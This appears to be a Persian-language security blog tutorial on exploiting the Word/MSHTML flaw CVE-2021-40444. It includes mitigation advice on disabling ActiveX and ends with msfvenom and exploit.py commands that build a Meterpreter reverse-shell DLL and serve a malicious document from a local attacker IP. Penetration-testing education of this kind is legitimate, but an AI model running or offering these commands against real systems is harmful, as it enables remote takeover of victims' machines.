۳۰ مهر ۱۴۰۰
  ۳۰ مهر ۱۴۰۰
0
0

آموزش هک ویندوز با فایل آفیس ورد (Word) با آسیب پذیری CVE-2021-40444

335 بازدید
هک ویندوز با ورد

در ۷ سپتامبر ۲۰۲۱ ، مایکروسافت در مورد آسیب پذیری صفر روز (CVE-2021-40444) در MSHTML مایکروسافت اطلاعیه ای منتشر کرده که هکرها می توانند با استفاده از اسناد مایکروسافت آفیس می توانند دستورات از راه دور روی سیستم قربانیان اجرا کنند. مایکروسافت فعلا به صورت موقت یک راحل برای این مشکل ارائه داده است تا زمانی که آنها یک وصله منتشر کنند.

این آسیب پذیری روز صفر (Zero Day) در نرم افزار MSHTML به وجود آمده است که این نرم افزار یک موتور مرورگر اختصاصی مایکروسافت برای Internet Explorer است. یک شخص اتکر می تواند یک ActiveX مخرب ایجاد کند که توسط مایکروسافت آفیس اجرا می شود.

خوشبختانه آنتی‌ ویروس Microsoft Defender هم اکنون توانایی تشخیص این آسیب پذیری را دارد. پس اگر از آنتی‌ ویروس Microsoft Defender حتما آن را آپدیت کنید تا بتوانید از این آسیب پذیری خطرناک جلوگیری کنید.

 

راهکارهایی برای جلوگیری از اکسپلویت شدن

به نقل از سایت apk-group.net می توانید از این حمله جلوگیری کنید

غیرفعال کردن نصب تمام کنترل‌های ActiveX در Internet Explorer جلوی این حمله را می‌گیرد. جهت انجام این کار برای تمام سایت‌ها می‌توان Group Policy را با استفاده از Local Group Policy Editor پیکربندی کرد یا Registry را بروزرسانی نمود. کنترل‌های ActiveX که قبلاً نصب شده بودند همچنان اجرا می‌شوند، اما این آسیب‌پذیری را افشا نمی‌کنند.

 

دستورات استفاده شده

msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=192.168.1.105 LPORT=9900 > /root/Desktop/payload.dll
python3 exploit.py generate test/payload.dll http://192.168.1.105
python3 exploit.py host 80

آیا این مطلب را می پسندید؟
https://cyberamooz.com/?p=3935
اشتراک گذاری:
میلاد رنجبر وبسایت شخصی
من میلاد رنجبر هستم. علاقه مند به دنیای هک و امنیت و برنامه نویسی هستم. دوست دارم هر چیزی رو که یاد میگیرم به زبان خیلی ساده به دوستان آموزش بدم. علاقه شدیدی به تست نفوذ سیستم ها دارم و تلاش می کنم همیشه در این شاخه از تست نفوذ پیشرفت کنم.
مطالب بیشتر

باکس دانلود

نظرات

2 نظر در مورد آموزش هک ویندوز با فایل آفیس ورد (Word) با آسیب پذیری CVE-2021-40444

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *